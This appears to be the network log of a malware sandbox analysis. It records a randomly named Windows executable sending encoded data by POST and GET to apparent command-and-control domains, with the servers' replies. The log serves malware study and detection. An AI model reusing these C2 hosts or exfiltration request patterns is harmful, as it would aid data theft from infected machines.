                                                            Data Raw: 79 58 37 3d 69 44 51 55 32 4b 54 52 48 6b 51 49 38 74 32 63 56 55 6e 67 47 33 6d 37 43 62 68 33 39 57 50 49 52 36 32 77 2f 55 6d 4b 62 45 69 66 76 6f 5a 79 59 4b 38 48 38 56 68 6f 79 69 64 59 31 63 49 68 64 4c 41 6c 75 57 30 54 69 38 6e 55 65 58 70 51 59 62 39 4e 38 78 39 63 4b 43 4a 74 4b 59 44 50 42 6b 32 63 4d 37 79 68 34 65 55 52 36 2b 71 37 74 32 42 52 4a 48 63 50 4c 63 2f 36 73 38 34 71 6c 41 34 77 4f 6d 73 67 30 43 4a 79 51 4f 4d 63 6e 38 55 52 4d 69 52 56 4d 4f 41 44 4b 30 5a 67 57 35 2b 47 59 36 57 75 36 70 72 6d 2b 68 64 4b 79 4d 36 47 5a 72 64 34 38 62 72 4a 52 41 78 32 38 45 66 35 42 43 54 77 68 37 47 7a
                                                            Data Ascii: yX7=iDQU2KTRHkQI8t2cVUngG3m7Cbh39WPIR62w/UmKbEifvoZyYK8H8VhoyidY1cIhdLAluW0Ti8nUeXpQYb9N8x9cKCJtKYDPBk2cM7yh4eUR6+q7t2BRJHcPLc/6s84qlA4wOmsg0CJyQOMcn8URMiRVMOADK0ZgW5+GY6Wu6prm+hdKyM6GZrd48brJRAx28Ef5BCTwh7Gz


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.6498743.33.130.190803196C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 25, 2024 13:45:22.263685942 CET855OUTPOST /79tr/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.beingandbecoming.ltd
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 232
                                                            Cache-Control: no-cache
                                                            Origin: http://www.beingandbecoming.ltd
                                                            Referer: http://www.beingandbecoming.ltd/79tr/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                            Data Raw: 79 58 37 3d 69 44 51 55 32 4b 54 52 48 6b 51 49 39 4e 47 63 58 33 66 67 48 58 6d 34 66 72 68 33 30 32 50 4d 52 36 79 77 2f 56 6a 53 62 53 36 66 76 4a 70 79 57 72 38 48 79 31 68 6f 35 43 64 64 34 38 49 75 64 4c 46 59 75 55 77 54 69 38 44 55 65 57 5a 51 62 73 70 4b 7a 42 39 4a 43 69 4a 76 56 49 44 50 42 6b 32 63 4d 37 33 32 34 65 4d 52 37 4f 36 37 69 31 5a 4f 56 58 63 49 66 4d 2f 36 6f 38 34 75 6c 41 34 43 4f 6e 41 4b 30 48 4e 79 51 4b 41 63 2b 49 49 65 57 79 52 54 49 4f 42 4e 47 6d 6f 4f 55 50 6a 44 53 61 57 33 75 75 71 42 2f 58 41 51 75 2f 36 6c 4c 37 39 36 38 5a 7a 37 52 67 78 63 2b 45 6e 35 54 56 66 58 75 50 6a 51 41 41 6d 52 49 77 6d 72 41 76 33 2b 39 65 43 72 56 46 33 50 39 51 3d 3d
                                                            Data Ascii: yX7=iDQU2KTRHkQI9NGcX3fgHXm4frh302PMR6yw/VjSbS6fvJpyWr8Hy1ho5Cdd48IudLFYuUwTi8DUeWZQbspKzB9JCiJvVIDPBk2cM7324eMR7O67i1ZOVXcIfM/6o84ulA4COnAK0HNyQKAc+IIeWyRTIOBNGmoOUPjDSaW3uuqB/XAQu/6lL7968Zz7Rgxc+En5TVfXuPjQAAmRIwmrAv3+9eCrVF3P9Q==


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.6498833.33.130.190803196C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 25, 2024 13:45:24.923760891 CET1868OUTPOST /79tr/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.beingandbecoming.ltd
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 1244
                                                            Cache-Control: no-cache
                                                            Origin: http://www.beingandbecoming.ltd
                                                            Referer: http://www.beingandbecoming.ltd/79tr/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                            Data Raw: 79 58 37 3d 69 44 51 55 32 4b 54 52 48 6b 51 49 39 4e 47 63 58 33 66 67 48 58 6d 34 66 72 68 33 30 32 50 4d 52 36 79 77 2f 56 6a 53 62 53 43 66 75 2b 42 79 5a 73 41 48 7a 31 68 6f 36 43 64 63 34 38 49 4a 64 4c 39 63 75 55 73 44 69 2b 4c 55 66 30 52 51 50 4a 46 4b 6b 52 39 4a 4f 43 4a 75 4b 59 43 4e 42 6b 6d 69 4d 37 6e 32 34 65 4d 52 37 4d 53 37 72 47 42 4f 47 6e 63 50 4c 63 2f 32 73 38 35 35 6c 44 4a 33 4f 6e 30 77 30 7a 35 79 51 71 51 63 38 64 55 65 4f 69 52 52 45 75 41 51 47 6d 6b 4e 55 4c 44 6c 53 5a 4b 4a 75 70 71 42 7a 67 52 7a 71 37 71 76 61 36 6c 59 71 4c 33 45 49 32 42 37 7a 6a 4c 2b 66 44 71 6c 70 38 33 72 4f 58 6d 63 49 52 58 54 50 50 2f 4f 2f 72 6e 4d 65 31 33 4c 68 32 74 32 47 74 5a 63 61 70 4d 56 35 7a 30 73 49 6a 63 53 30 6e 45 44 34 53 6b 59 63 49 48 45 38 65 59 48 4a 38 51 4b 72 45 55 5a 38 4b 32 61 58 4d 63 34 48 79 6b 69 38 4d 74 48 73 79 71 70 2b 6b 73 59 4f 44 52 2b 43 56 47 67 75 36 75 48 57 6d 4c 69 36 5a 71 41 69 2f 56 69 48 2f 73 66 73 33 2b 78 70 41 34 6a 43 50 69 4f 72 2f [TRUNCATED]
                                                            Data Ascii: yX7=iDQU2KTRHkQI9NGcX3fgHXm4frh302PMR6yw/VjSbSCfu+ByZsAHz1ho6Cdc48IJdL9cuUsDi+LUf0RQPJFKkR9JOCJuKYCNBkmiM7n24eMR7MS7rGBOGncPLc/2s855lDJ3On0w0z5yQqQc8dUeOiRREuAQGmkNULDlSZKJupqBzgRzq7qva6lYqL3EI2B7zjL+fDqlp83rOXmcIRXTPP/O/rnMe13Lh2t2GtZcapMV5z0sIjcS0nED4SkYcIHE8eYHJ8QKrEUZ8K2aXMc4Hyki8MtHsyqp+ksYODR+CVGgu6uHWmLi6ZqAi/ViH/sfs3+xpA4jCPiOr/KUqlNTU6oZd8+3WhY8yybIf74WV8yHGowbhaK9TKK/7lyvryL47uAeLbXlDdSW/3EhYvRzq5RXOCTe5EfcaP3V1BSHJCpBaW52ArDLjyrev5wgg4AK3UIentyikHZf3VObVSE70HHTn6lUn65v14CgQN1RWP0eom0U3yuwU+QkboWLLPnAi861WG8bFJryzhL0cIVWIeoJq7BfytyxmejP2TZJ1oG8N5h9fCAI4BcdKTl9Ze6v1UZmT19GEjLqRU2kUpfKFDHKjqt4lUyYRE6gLN8RcLmGGOjG+ZGw3EJU+sI243fPJpEW6L5oyb0HUVAdKHP1yclUXk/W3pEAm3u3CMT4b4HiJc6/E5wAhLYOLwdQuGMl7umQDPLUGTGxonr3qYQ/kTPGYi25uhalEWqJIDZx2bRU3S74gkZnZVgNmeYj7Wsloxq7V5BT/YhMepMImOTKB3lWsDU5n7n9gR2JGKy8G8VXUO8Q6t9cKpFy/fdo9dqCeydeOjIG+PaAWQuP9i74DpPohatSQMNHgnS5ikQ0u2Nc7Ttv8WbeaIA3QAePu0C5+3tbCbhCIywZZl2w66ITKUCdmiYVJTnOVdCOEWbD2lpQYu+wDVjE5qwrA50b3RbHEVUR9Jpn8Eh6DKkefaskXfkZqKKB8rWPq1uxiGZZ0K4oDclc [TRUNCATED]


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.6498903.33.130.190803196C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 25, 2024 13:45:27.582034111 CET551OUTGET /79tr/?yX7=vB4016rwfH0MxtawL3zGYGaXYsIh8iPne8uh+mnoHReWloNmM7dp4Fgr6wtK7PtcWtNvsE0Cpt3tQWtVQrZPygs+MxIMUNH2akCfN7/CzpsZyLj6qmJ1F1UuDNbdqvUipDEiTgU=&Hx=ot9h HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.beingandbecoming.ltd
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                            Nov 25, 2024 13:45:28.719489098 CET403INHTTP/1.1 200 OK
                                                            Server: openresty
                                                            Date: Mon, 25 Nov 2024 12:45:28 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 263
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 79 58 37 3d 76 42 34 30 31 36 72 77 66 48 30 4d 78 74 61 77 4c 33 7a 47 59 47 61 58 59 73 49 68 38 69 50 6e 65 38 75 68 2b 6d 6e 6f 48 52 65 57 6c 6f 4e 6d 4d 37 64 70 34 46 67 72 36 77 74 4b 37 50 74 63 57 74 4e 76 73 45 30 43 70 74 33 74 51 57 74 56 51 72 5a 50 79 67 73 2b 4d 78 49 4d 55 4e 48 32 61 6b 43 66 4e 37 2f 43 7a 70 73 5a 79 4c 6a 36 71 6d 4a 31 46 31 55 75 44 4e 62 64 71 76 55 69 70 44 45 69 54 67 55 3d 26 48 78 3d 6f 74 39 68 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?yX7=vB4016rwfH0MxtawL3zGYGaXYsIh8iPne8uh+mnoHReWloNmM7dp4Fgr6wtK7PtcWtNvsE0Cpt3tQWtVQrZPygs+MxIMUNH2akCfN7/CzpsZyLj6qmJ1F1UuDNbdqvUipDEiTgU=&Hx=ot9h"}</script></head></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.649906203.161.49.193803196C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 25, 2024 13:45:34.450251102 CET822OUTPOST /hxmz/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.futurevision.life
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 208
                                                            Cache-Control: no-cache
                                                            Origin: http://www.futurevision.life
                                                            Referer: http://www.futurevision.life/hxmz/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                            Data Raw: 79 58 37 3d 38 63 77 4e 39 6d 4a 58 6b 39 44 55 45 72 38 6d 38 70 61 42 53 33 46 2f 62 66 6c 69 34 63 2f 4b 72 41 75 39 66 72 51 63 42 70 71 4c 5a 56 4b 58 6d 46 6b 73 57 42 6a 45 42 7a 49 73 7a 2f 52 67 71 47 6c 36 76 6e 4f 77 65 48 33 49 4e 45 45 4d 5a 45 72 63 75 64 51 72 64 4e 72 39 35 53 69 4c 78 43 34 73 58 6b 65 6c 64 51 6f 46 34 38 39 2f 58 6f 54 63 70 79 42 4d 76 61 43 64 51 56 35 4d 6e 72 48 4d 62 6f 47 61 67 73 55 6f 61 39 35 37 53 39 48 65 70 76 52 74 63 68 73 79 51 56 4e 4c 52 46 35 35 34 6b 43 70 47 44 76 6b 69 58 50 45 34 38 74 65 61 53 4d 65 6b 78 4e 4d 67 74 4d 54 47 71 6b 68 4b 6a 57 4f 2b 59 7a 4b
                                                            Data Ascii: yX7=8cwN9mJXk9DUEr8m8paBS3F/bfli4c/KrAu9frQcBpqLZVKXmFksWBjEBzIsz/RgqGl6vnOweH3INEEMZErcudQrdNr95SiLxC4sXkeldQoF489/XoTcpyBMvaCdQV5MnrHMboGagsUoa957S9HepvRtchsyQVNLRF554kCpGDvkiXPE48teaSMekxNMgtMTGqkhKjWO+YzK
                                                            Nov 25, 2024 13:45:35.709458113 CET533INHTTP/1.1 404 Not Found
                                                            Date: Mon, 25 Nov 2024 12:45:35 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.649913203.161.49.193803196C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 25, 2024 13:45:37.109692097 CET846OUTPOST /hxmz/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.futurevision.life
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 232
                                                            Cache-Control: no-cache
                                                            Origin: http://www.futurevision.life
                                                            Referer: http://www.futurevision.life/hxmz/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                            Data Raw: 79 58 37 3d 38 63 77 4e 39 6d 4a 58 6b 39 44 55 57 2f 41 6d 76 34 61 42 61 33 46 38 65 66 6c 69 32 38 2f 4f 72 41 69 39 66 71 55 79 42 2f 36 4c 65 78 61 58 6e 45 6b 73 52 42 6a 45 4b 54 49 70 33 2f 52 76 71 47 70 79 76 6b 57 77 65 48 6a 49 4e 41 55 4d 59 7a 2f 66 38 64 51 70 57 74 72 2f 32 79 69 4c 78 43 34 73 58 6b 61 50 64 51 77 46 37 4e 4e 2f 56 4a 54 64 6b 53 42 54 6f 61 43 64 42 46 34 4c 6e 72 48 4c 62 74 65 30 67 71 59 6f 61 34 64 37 54 6f 7a 66 6a 76 52 6a 54 42 74 32 44 57 6f 31 4a 57 49 5a 79 53 65 50 54 77 58 37 71 42 53 65 6b 50 74 39 49 43 73 63 6b 7a 56 2b 67 4e 4d 35 45 71 63 68 59 30 61 70 78 73 57 70 65 46 44 59 4f 4e 71 74 71 2f 65 66 6d 32 49 45 4a 6a 65 70 34 51 3d 3d
                                                            Data Ascii: yX7=8cwN9mJXk9DUW/Amv4aBa3F8efli28/OrAi9fqUyB/6LexaXnEksRBjEKTIp3/RvqGpyvkWweHjINAUMYz/f8dQpWtr/2yiLxC4sXkaPdQwF7NN/VJTdkSBToaCdBF4LnrHLbte0gqYoa4d7TozfjvRjTBt2DWo1JWIZySePTwX7qBSekPt9ICsckzV+gNM5EqchY0apxsWpeFDYONqtq/efm2IEJjep4Q==
                                                            Nov 25, 2024 13:45:38.417433977 CET533INHTTP/1.1 404 Not Found
                                                            Date: Mon, 25 Nov 2024 12:45:38 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.649919203.161.49.193803196C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 25, 2024 13:45:39.778448105 CET1859OUTPOST /hxmz/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.futurevision.life
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 1244
                                                            Cache-Control: no-cache
                                                            Origin: http://www.futurevision.life
                                                            Referer: http://www.futurevision.life/hxmz/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                            Data Raw: 79 58 37 3d 38 63 77 4e 39 6d 4a 58 6b 39 44 55 57 2f 41 6d 76 34 61 42 61 33 46 38 65 66 6c 69 32 38 2f 4f 72 41 69 39 66 71 55 79 42 2f 79 4c 65 47 79 58 6d 6a 34 73 51 42 6a 45 4a 54 49 6f 33 2f 52 32 71 47 68 32 76 6a 65 47 65 42 76 49 4e 69 63 4d 66 47 44 66 32 64 51 70 4c 39 72 2b 35 53 69 65 78 43 6f 67 58 6b 4b 50 64 51 77 46 37 4f 56 2f 53 59 54 64 6d 53 42 4d 76 61 43 76 51 56 34 76 6e 76 72 39 62 74 54 42 67 61 34 6f 61 65 39 37 65 2b 66 66 76 76 52 32 51 42 74 51 44 57 55 51 4a 57 55 6a 79 53 43 78 54 7a 4c 37 70 6b 4b 49 77 62 5a 6d 64 6a 68 77 77 41 55 55 6a 34 49 6f 41 71 67 69 58 56 75 65 31 4f 4c 4b 5a 46 7a 55 46 62 33 33 6f 4f 4f 47 68 47 31 71 4d 7a 62 58 71 5a 33 43 57 63 42 48 49 6b 75 6e 73 6e 66 6e 62 5a 78 52 6a 4f 59 67 68 6d 6e 33 50 70 35 51 38 6e 45 4a 6d 45 4a 41 59 30 4e 45 74 79 6b 30 31 52 4a 2f 32 6f 48 49 2f 72 39 63 45 64 37 4c 4e 71 55 74 38 6a 67 59 6e 33 67 6f 4e 74 38 4e 6b 42 39 77 50 32 41 48 4e 2b 30 4e 57 6c 4d 70 52 38 73 77 7a 57 6a 76 67 32 4d 6d 4c 43 [TRUNCATED]
                                                            Data Ascii: yX7=8cwN9mJXk9DUW/Amv4aBa3F8efli28/OrAi9fqUyB/yLeGyXmj4sQBjEJTIo3/R2qGh2vjeGeBvINicMfGDf2dQpL9r+5SiexCogXkKPdQwF7OV/SYTdmSBMvaCvQV4vnvr9btTBga4oae97e+ffvvR2QBtQDWUQJWUjySCxTzL7pkKIwbZmdjhwwAUUj4IoAqgiXVue1OLKZFzUFb33oOOGhG1qMzbXqZ3CWcBHIkunsnfnbZxRjOYghmn3Pp5Q8nEJmEJAY0NEtyk01RJ/2oHI/r9cEd7LNqUt8jgYn3goNt8NkB9wP2AHN+0NWlMpR8swzWjvg2MmLCQiPkmq1nOybW4UG/IflJibWXtAMOgtyIa8OlOXd6OvZUcZeHM1QNVLRfVxf7QqNe/f3tSq2m+2XOM1fvQTmz69qHgsF8KZYH6P6Q+fmvvNTiEJ7h/zWxg1KyH/e4GCX7NZClQ7o4btp6h+bAWtem4X7OOFUhypXVrDpSXyZDvPzVhTIYpt3Y4Moed2nEaBolFDIw7m9O26aFtjRKi9h0lJs1o8liItLYPQIKSKRgVW2rpRgVMZibNGqWH6vmKhPEf8qWJjoyPtqy7fEVdd9hYITwN0BKDpIpXC6R21NMHnJBGSQkOGVCIfy2RM/MzHewJJ69zlBz4ft8OW7CMbYG3aW9gxzMhQVLUGDU8UtKrlisEnFOLOLok6uc1uU5xLsKURByCF8+C7iWe3x0FknNmBnZoHQxxnlWGqVZ2aK7c+5UFESr1poxWVc2ywq66Pmc1EELBj03fQ1o8MXjA+vW7ac0MUOw7T3iyjocT6F4niQTTUDadkL8C1FAMvgHUkVlEy6nXMydnr6YA7IQEaQ5qayTmuSVzukpLX7dEFkA1bLTZSDwZlNco5C/bjScOURkqKacPmaZpiaEJTL5klYbS5EyAYi3F9tWP2cE34W7GrU82L6u5AkPftEGxVOZpGzObDXkQPxU+m7xADUzmOVqtGyjqAH5YD4aBl [TRUNCATED]
                                                            Nov 25, 2024 13:45:41.100908995 CET533INHTTP/1.1 404 Not Found
                                                            Date: Mon, 25 Nov 2024 12:45:40 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.649928203.161.49.193803196C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 25, 2024 13:45:42.436083078 CET548OUTGET /hxmz/?Hx=ot9h&yX7=xeYt+TVrluKccowhuJaDBktUUZBiwtnijwrYeJgffsaeXHWEwE1YZCbtIyEm+ckVl2hmk1+GOFDMCTsPe0H768cQaPGnwmWpoBoTXnujTk0fw5ooQYelqhpppqeWfG8SjK30Qts= HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.futurevision.life
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                            Nov 25, 2024 13:45:43.659126043 CET548INHTTP/1.1 404 Not Found
                                                            Date: Mon, 25 Nov 2024 12:45:43 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
